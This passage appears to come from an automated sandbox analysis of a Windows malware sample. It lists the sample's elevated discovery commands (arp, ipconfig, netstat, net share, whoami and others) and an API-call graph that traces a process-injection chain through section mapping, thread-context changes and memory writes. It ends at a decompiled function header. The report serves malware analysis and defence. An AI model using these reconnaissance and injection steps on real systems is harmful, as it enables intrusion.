                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                              Start time:19:52:13
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                              Start time:19:52:25
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:cmd /c set
                                                                                                                                                                                                              Imagebase:0x4d0000
                                                                                                                                                                                                              File size:236544 bytes
                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                              Start time:19:52:25
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                              Start time:19:52:25
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\ARP.EXE
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:arp -a
                                                                                                                                                                                                              Imagebase:0x20000
                                                                                                                                                                                                              File size:22528 bytes
                                                                                                                                                                                                              MD5 hash:4D3943EDBC9C7E18DC3469A21B30B3CE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                              Start time:19:52:25
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                              Start time:19:52:26
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:ipconfig /all
                                                                                                                                                                                                              Imagebase:0x6d0000
                                                                                                                                                                                                              File size:29184 bytes
                                                                                                                                                                                                              MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                              Start time:19:52:26
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                              Start time:19:52:26
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:net share
                                                                                                                                                                                                              Imagebase:0xb40000
                                                                                                                                                                                                              File size:47104 bytes
                                                                                                                                                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                              Start time:19:52:26
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                              Start time:19:52:26
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\system32\net1 share
                                                                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                                                                              File size:139776 bytes
                                                                                                                                                                                                              MD5 hash:207DEB8572F128E9AE8062D9CF3A6E8A
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                              Start time:19:52:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\ROUTE.EXE
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:route print
                                                                                                                                                                                                              Imagebase:0xa40000
                                                                                                                                                                                                              File size:19456 bytes
                                                                                                                                                                                                              MD5 hash:C563191ED28A926BCFDB1071374575F1
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                              Start time:19:52:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                              Start time:19:52:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:netstat -nao
                                                                                                                                                                                                              Imagebase:0x9c0000
                                                                                                                                                                                                              File size:32768 bytes
                                                                                                                                                                                                              MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                              Start time:19:52:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                              Start time:19:52:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:net localgroup
                                                                                                                                                                                                              Imagebase:0xb40000
                                                                                                                                                                                                              File size:47104 bytes
                                                                                                                                                                                                              MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                              Start time:19:52:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                              Start time:19:52:27
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                                                                              File size:139776 bytes
                                                                                                                                                                                                              MD5 hash:207DEB8572F128E9AE8062D9CF3A6E8A
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                              Start time:19:52:28
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\whoami.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:whoami /all
                                                                                                                                                                                                              Imagebase:0x250000
                                                                                                                                                                                                              File size:58880 bytes
                                                                                                                                                                                                              MD5 hash:801D9A1C1108360B84E60A457D5A773A
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                              Start time:19:52:28
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff6553c0000
                                                                                                                                                                                                              File size:875008 bytes
                                                                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                              Start time:19:52:28
                                                                                                                                                                                                              Start date:07/02/2023
                                                                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                              Imagebase:0x7ff73bd10000
                                                                                                                                                                                                              File size:69632 bytes
                                                                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:1.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:90.8%
                                                                                                                                                                                                                Signature Coverage:27.5%
                                                                                                                                                                                                                Total number of Nodes:403
                                                                                                                                                                                                                Total number of Limit Nodes:5
                                                                                                                                                                                                                execution_graph 37372 10001080 37373 10001090 ExitProcess 37372->37373 37374 100010a0 37375 100010b2 37374->37375 37378 10001142 37374->37378 37404 10009510 HeapCreate 37375->37404 37377 100010b7 37405 100098ff 37377->37405 37383 100010e5 37412 100098ae 37383->37412 37388 1000114a 37425 1000a291 37388->37425 37389 1000113d 37390 1000a291 2 API calls 37389->37390 37390->37378 37397 1000119f CreateThread 37397->37378 37485 1000169f 37397->37485 37398 100098ae 8 API calls 37399 1000117b 37398->37399 37438 100017cf 12 API calls 37399->37438 37401 10001185 37439 1000953b 37401->37439 37404->37377 37444 10009525 RtlAllocateHeap 37405->37444 37407 100010bc 37408 10014d5f 37407->37408 37409 10014d77 37408->37409 37445 1000958a 37409->37445 37411 100010d0 GetPEB 37411->37383 37449 10009473 37412->37449 37415 100098d0 GetModuleHandleA 37417 100098df 37415->37417 37416 100098d8 LoadLibraryA 37416->37417 37420 100098ed 37417->37420 37452 10009863 37417->37452 37457 1000a27e 37420->37457 37422 1000948d 37475 1000a1ab 37422->37475 37424 10001129 GetFileAttributesW 37424->37388 37424->37389 37426 1000a29f 37425->37426 37428 1000114f 37425->37428 37427 1000953b 2 API calls 37426->37427 37427->37428 37429 100019a6 37428->37429 37430 1000a1ab 2 API calls 37429->37430 37431 10001159 37430->37431 37432 100094ad 37431->37432 37433 100094c9 37432->37433 37434 10001162 37433->37434 37481 10009525 RtlAllocateHeap 37433->37481 37434->37397 37434->37398 37436 100094dc 37436->37434 37437 1000953b 2 API calls 37436->37437 37437->37434 37438->37401 37440 10001190 37439->37440 37441 10009545 37439->37441 37440->37397 37441->37440 37482 100096bf 37441->37482 37444->37407 37448 10009525 RtlAllocateHeap 37445->37448 37447 1000959b 37447->37411 37448->37447 37461 1000a0e3 37449->37461 37468 10009525 RtlAllocateHeap 37452->37468 37454 100098a4 37454->37420 37455 10009875 37455->37454 37469 1000970d 37455->37469 37458 10001118 37457->37458 37459 1000a286 37457->37459 37458->37422 37460 1000953b 2 API calls 37459->37460 37460->37458 37463 1000a0fa 37461->37463 37466 1000a10f 37461->37466 37462 1000a156 lstrlenW 37464 10009489 37462->37464 37463->37466 37467 10009525 RtlAllocateHeap 37463->37467 37464->37415 37464->37416 37466->37462 37466->37464 37467->37466 37468->37455 37470 10009781 37469->37470 37471 10009726 37469->37471 37470->37455 37471->37470 37472 100097d9 LoadLibraryA 37471->37472 37472->37470 37473 100097e7 GetProcAddress 37472->37473 37473->37470 37474 100097f3 37473->37474 37474->37470 37477 1000a1c5 37475->37477 37476 1000a229 lstrlenW 37480 10009525 RtlAllocateHeap 37476->37480 37477->37476 37477->37477 37479 1000a243 37479->37424 37479->37479 37480->37479 37481->37436 37483 100096c8 memset 37482->37483 37484 10009575 HeapFree 37482->37484 37483->37484 37484->37440 37506 1000188e 37485->37506 37489 100016c3 37490 100016f1 CoInitializeEx 37489->37490 37500 100016cd 37489->37500 37505 10001768 37489->37505 37590 10009dc8 37490->37590 37492 10001795 37495 100017c3 37492->37495 37496 1000179f 37492->37496 37597 100014fa 91 API calls 37495->37597 37496->37500 37596 10002e87 RtlAllocateHeap lstrlenW _ftol2_sse 37496->37596 37497 100019a6 2 API calls 37501 10001722 37497->37501 37502 10001752 Sleep 37501->37502 37503 1000175f 37501->37503 37502->37501 37504 1000a291 2 API calls 37503->37504 37504->37505 37505->37492 37572 1000a843 37505->37572 37507 100098ae 8 API calls 37506->37507 37508 100018a2 37507->37508 37509 100098ae 8 API calls 37508->37509 37510 100018bb 37509->37510 37511 100098ae 8 API calls 37510->37511 37512 100018d4 37511->37512 37513 100098ae 8 API calls 37512->37513 37514 100018ed 37513->37514 37515 100098ae 8 API calls 37514->37515 37516 10001906 37515->37516 37517 100098ae 8 API calls 37516->37517 37518 10001921 37517->37518 37519 100098ae 8 API calls 37518->37519 37520 1000193a 37519->37520 37521 100098ae 8 API calls 37520->37521 37522 10001953 37521->37522 37523 100098ae 8 API calls 37522->37523 37524 1000196c 37523->37524 37525 100098ae 8 API calls 37524->37525 37526 100016ab GetLocaleInfoA 37525->37526 37527 1000b231 37526->37527 37598 10009525 RtlAllocateHeap 37527->37598 37529 1000b24c 37530 1000b257 GetCurrentProcessId 37529->37530 37571 1000b5c9 37529->37571 37531 1000b26f 37530->37531 37599 1000e500 37531->37599 37533 1000b2d3 37613 1000ee8d 37533->37613 37534 1000b2c2 37534->37533 37604 1000e550 37534->37604 37539 1000b308 37540 1000b352 GetLastError 37539->37540 37541 1000b358 37539->37541 37540->37541 37544 1000b388 37541->37544 37681 1000b194 9 API calls 37541->37681 37622 1000d7b0 37544->37622 37549 1000b3d7 37639 1000d7c6 37549->37639 37554 100096bf memset 37555 1000b42e GetVersionExA 37554->37555 37658 1000af90 37555->37658 37559 1000b44c GetWindowsDirectoryW 37560 1000948d 2 API calls 37559->37560 37561 1000b46f 37560->37561 37562 1000a291 2 API calls 37561->37562 37563 1000b4a9 37562->37563 37565 1000b4e1 37563->37565 37682 1000b76a 37563->37682 37664 10015194 37565->37664 37571->37489 37573 1000a861 37572->37573 37574 1000a884 lstrlenW 37573->37574 37746 1000a73e 37574->37746 37577 1000a9c6 37579 1000953b 2 API calls 37577->37579 37578 1000a89f 37583 1000a8c3 lstrlenW 37578->37583 37582 1000a9d0 37579->37582 37580 1000a9b4 37580->37577 37581 1000953b 2 API calls 37580->37581 37581->37580 37582->37492 37583->37582 37584 100096bf memset 37588 1000a8d4 37584->37588 37588->37577 37588->37580 37588->37584 37754 1000d038 37588->37754 37759 1000aa02 37588->37759 37774 1000ab5a 37588->37774 37779 1000ea4b 6 API calls 37588->37779 37592 10009dda 37590->37592 37848 10009525 RtlAllocateHeap 37592->37848 37593 10009df9 37594 10001716 37593->37594 37595 10009e05 lstrcatW 37593->37595 37594->37497 37595->37593 37596->37500 37597->37500 37598->37529 37600 1000e517 37599->37600 37601 1000e51b 37600->37601 37686 1000e4e9 37600->37686 37601->37534 37699 1000e425 GetCurrentThread OpenThreadToken 37604->37699 37607 1000e606 37607->37533 37608 1000e47c 6 API calls 37609 1000e584 FindCloseChangeNotification 37608->37609 37609->37607 37611 1000e5fc 37609->37611 37612 1000953b 2 API calls 37611->37612 37612->37607 37615 1000eeac 37613->37615 37614 1000b2fd 37617 1000ee52 37614->37617 37615->37614 37704 10009c2b RtlAllocateHeap 37615->37704 37618 1000ee69 37617->37618 37619 1000ee89 37618->37619 37705 10009c2b RtlAllocateHeap 37618->37705 37619->37539 37621 1000ee76 37621->37539 37706 1000d6d1 37622->37706 37624 1000b3b4 37625 1000d5a6 37624->37625 37626 1000d5c1 37625->37626 37627 10009473 2 API calls 37626->37627 37628 1000d5cb 37627->37628 37721 100152ee 37628->37721 37630 1000d616 37631 1000a27e 2 API calls 37630->37631 37633 1000b3ca 37631->37633 37632 1000d5e0 37632->37630 37634 100152ee 2 API calls 37632->37634 37635 10009d4d 37633->37635 37634->37632 37636 10009d54 37635->37636 37637 10009d59 MultiByteToWideChar 37635->37637 37636->37549 37638 10009d6d 37637->37638 37638->37549 37640 10009473 2 API calls 37639->37640 37641 1000d7e1 37640->37641 37642 10009473 2 API calls 37641->37642 37644 1000d7f0 37642->37644 37643 1000b405 37652 1000e6cd 37643->37652 37644->37643 37645 100152ee 2 API calls 37644->37645 37646 1000d841 37644->37646 37645->37644 37647 100152ee 2 API calls 37646->37647 37648 1000d86c 37646->37648 37647->37646 37649 1000a27e 2 API calls 37648->37649 37650 1000d878 37649->37650 37651 1000a27e 2 API calls 37650->37651 37651->37643 37653 1000e6e5 37652->37653 37654 1000e47c 6 API calls 37653->37654 37655 1000b417 37653->37655 37656 1000e6fd 37654->37656 37655->37554 37656->37655 37657 1000953b 2 API calls 37656->37657 37657->37655 37659 1000afa5 GetCurrentProcess IsWow64Process 37658->37659 37660 1000afb6 37658->37660 37659->37660 37661 1000afb9 37660->37661 37662 1000afc3 37661->37662 37663 1000afc8 GetSystemInfo 37661->37663 37662->37559 37663->37559 37665 1000b5aa 37664->37665 37666 1001519f 37664->37666 37668 10009a48 37665->37668 37666->37665 37667 100152ee 2 API calls 37666->37667 37667->37666 37726 100099d0 37668->37726 37671 1000ac45 37672 1000af1f 37671->37672 37673 10009473 2 API calls 37672->37673 37675 1000af4f 37672->37675 37677 1000a27e 2 API calls 37672->37677 37741 10009ea1 RtlAllocateHeap 37672->37741 37673->37672 37732 1000cd1e CreateToolhelp32Snapshot 37675->37732 37677->37672 37678 1000af6b 37679 1000af88 37678->37679 37742 10009f9a HeapFree memset 37678->37742 37679->37571 37681->37544 37683 100096bf memset 37682->37683 37684 1000b77e _vsnwprintf 37683->37684 37685 1000b79b 37684->37685 37685->37565 37689 1000e47c GetTokenInformation 37686->37689 37690 1000e49e GetLastError 37689->37690 37694 1000e4bb 37689->37694 37691 1000e4a9 37690->37691 37690->37694 37698 10009525 RtlAllocateHeap 37691->37698 37693 1000e4b1 37693->37694 37695 1000e4bf GetTokenInformation 37693->37695 37694->37534 37695->37694 37696 1000e4d4 37695->37696 37697 1000953b 2 API calls 37696->37697 37697->37694 37698->37693 37700 1000e472 37699->37700 37701 1000e446 GetLastError 37699->37701 37700->37607 37700->37608 37701->37700 37702 1000e453 OpenProcessToken 37701->37702 37702->37700 37704->37614 37705->37621 37707 100096bf memset 37706->37707 37708 1000d6f3 lstrcpynW 37707->37708 37710 1000948d 2 API calls 37708->37710 37711 1000d725 GetVolumeInformationW 37710->37711 37712 1000a291 2 API calls 37711->37712 37713 1000d75a 37712->37713 37714 1000b76a 2 API calls 37713->37714 37715 1000d77b lstrcatW 37714->37715 37719 1000d3a2 37715->37719 37718 1000d7a1 37718->37624 37720 1000d3aa CharUpperBuffW 37719->37720 37720->37718 37722 100152fe 37721->37722 37722->37722 37723 10015331 lstrlenW 37722->37723 37724 1001534e _ftol2_sse 37723->37724 37724->37632 37727 100099e0 37726->37727 37727->37727 37728 100152ee 2 API calls 37727->37728 37731 100099fb 37728->37731 37729 10009a2f 37729->37671 37730 100152ee 2 API calls 37730->37731 37731->37729 37731->37730 37733 1000cd73 37732->37733 37734 1000cd48 37732->37734 37733->37678 37735 100096bf memset 37734->37735 37736 1000cd5a Process32First 37735->37736 37736->37733 37737 1000cd81 37736->37737 37738 1000cd93 Process32Next 37737->37738 37739 1000cda6 FindCloseChangeNotification 37737->37739 37743 1000abcf 37737->37743 37738->37737 37738->37739 37739->37733 37741->37672 37742->37678 37744 1000abe0 37743->37744 37745 1000ac31 Sleep 37743->37745 37744->37745 37745->37737 37747 1000a75a 37746->37747 37780 10009525 RtlAllocateHeap 37747->37780 37749 1000a7d5 37750 1000948d 2 API calls 37749->37750 37751 1000a832 37749->37751 37752 1000a291 2 API calls 37749->37752 37781 10009c2b RtlAllocateHeap 37749->37781 37750->37749 37751->37578 37751->37588 37752->37749 37755 100096bf memset 37754->37755 37756 1000d04e 37755->37756 37757 100096bf memset 37756->37757 37758 1000d05b CreateProcessW 37757->37758 37758->37588 37760 1000aa28 37759->37760 37762 1000aa3e 37760->37762 37782 1000a2bd 37760->37782 37773 1000aa53 37762->37773 37810 1000a4a8 37762->37810 37766 1000aa62 37766->37588 37767 100096bf memset 37768 1000aa8c Wow64GetThreadContext 37767->37768 37769 1000aab2 37768->37769 37768->37773 37769->37766 37770 1000aae6 NtProtectVirtualMemory 37769->37770 37771 1000ab0f NtWriteVirtualMemory 37770->37771 37770->37773 37772 1000ab2c NtProtectVirtualMemory 37771->37772 37771->37773 37772->37773 37804 1000a3ec 37773->37804 37831 1000b687 37774->37831 37777 1000ab95 GetLastError ResumeThread 37778 1000abb7 37777->37778 37778->37588 37779->37588 37780->37749 37781->37749 37783 1000948d 2 API calls 37782->37783 37784 1000a2d5 37783->37784 37785 1000b76a 2 API calls 37784->37785 37786 1000a30c 37785->37786 37787 1000948d 2 API calls 37786->37787 37788 1000a32b 37787->37788 37789 10009dc8 2 API calls 37788->37789 37790 1000a345 37789->37790 37791 1000a291 2 API calls 37790->37791 37792 1000a353 37791->37792 37793 10009dc8 2 API calls 37792->37793 37794 1000a376 CopyFileW LoadLibraryW 37793->37794 37795 1000a3a1 37794->37795 37796 1000a3af 37794->37796 37797 10009863 3 API calls 37795->37797 37798 1000953b 2 API calls 37796->37798 37797->37796 37799 1000a3bd 37798->37799 37800 100096bf memset 37799->37800 37801 1000a3d0 37800->37801 37802 1000a3e3 37801->37802 37803 1000953b 2 API calls 37801->37803 37802->37762 37803->37802 37805 1000a403 37804->37805 37806 1000a3f5 FreeLibrary 37804->37806 37807 1000a424 37805->37807 37808 1000a40c DeleteFileW 37805->37808 37806->37805 37807->37766 37809 1000953b 2 API calls 37808->37809 37809->37807 37811 1000a4db 37810->37811 37812 1000a4f9 NtCreateSection 37811->37812 37817 1000a6f0 37811->37817 37813 1000a522 RegisterClassExA 37812->37813 37812->37817 37814 1000a5b5 NtMapViewOfSection 37813->37814 37815 1000a579 CreateWindowExA 37813->37815 37814->37817 37823 1000a5e8 NtMapViewOfSection 37814->37823 37815->37814 37818 1000a5a3 DestroyWindow UnregisterClassA 37815->37818 37816 1000a725 37819 1000a739 37816->37819 37820 1000a72e NtClose 37816->37820 37817->37816 37822 1000a721 NtUnmapViewOfSection 37817->37822 37818->37814 37819->37767 37819->37773 37820->37819 37822->37816 37823->37817 37824 1000a60c 37823->37824 37825 1000958a RtlAllocateHeap 37824->37825 37826 1000a61c 37825->37826 37826->37817 37827 1000a629 VirtualAllocEx WriteProcessMemory 37826->37827 37828 1000953b 2 API calls 37827->37828 37829 1000a672 37828->37829 37830 1000a6d4 lstrlenW 37829->37830 37830->37817 37832 1000b6a0 37831->37832 37835 1000b5d6 37832->37835 37836 10015194 2 API calls 37835->37836 37837 1000b5ee 37836->37837 37838 10009473 2 API calls 37837->37838 37839 1000b618 37838->37839 37844 1000b72b 37839->37844 37841 1000b676 37842 1000a27e 2 API calls 37841->37842 37843 1000ab7b 37842->37843 37843->37777 37843->37778 37845 100096bf memset 37844->37845 37846 1000b73f _vsnprintf 37845->37846 37847 1000b759 37846->37847 37847->37841 37848->37593 37849 6934cd39 37868 6934cd47 37849->37868 37851 6934cd8e 37852 6934d31c 37856 6934d365 Spcre_valid_utf 37852->37856 37861 6934cdc5 37852->37861 37862 6934d39e 37852->37862 37853 6934ce5c strncmp 37854 6934cea4 strncmp 37853->37854 37853->37868 37855 6934cede strncmp 37854->37855 37854->37868 37857 6934cf18 strncmp 37855->37857 37855->37868 37856->37861 37856->37862 37858 6934cf52 strncmp 37857->37858 37857->37868 37859 6934cf8c strncmp 37858->37859 37858->37868 37863 6934d064 strncmp 37859->37863 37859->37868 37860 6934d4c4 strlen 37889 6934be9c memmove Spcre_is_newline memmove 37860->37889 37861->37851 37883 693416c0 37861->37883 37862->37860 37862->37861 37864 6934d13c strncmp 37863->37864 37863->37868 37866 6934d176 strncmp 37864->37866 37864->37868 37867 6934d1b0 strncmp 37866->37867 37866->37868 37867->37868 37869 6934d1ea strncmp 37867->37869 37868->37851 37868->37852 37868->37853 37868->37861 37869->37868 37870 6934d224 strncmp 37869->37870 37870->37868 37871 6934d25b strncmp 37870->37871 37871->37868 37872 6934d292 strncmp 37871->37872 37872->37868 37874 6934d681 37874->37861 37875 6934d8cc 37874->37875 37890 6934cbf7 memcmp memmove memcpy 37874->37890 37891 6934be9c memmove Spcre_is_newline memmove 37875->37891 37877 6934d98e 37878 6934daa9 37877->37878 37880 6934dae9 Spcre_find_bracket 37877->37880 37878->37861 37879 6934dc08 Spcre_find_bracket 37878->37879 37882 6934dc30 37879->37882 37880->37877 37881 6934dd35 Spcre_find_bracket 37881->37882 37882->37861 37882->37881 37884 693416a3 VirtualAlloc 37883->37884 37886 69341480 VirtualFree 37884->37886 37888 69341466 37886->37888 37888->37851 37889->37874 37890->37874 37891->37877

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                			E1000A4A8(void* __ecx, intOrPtr __edx) {
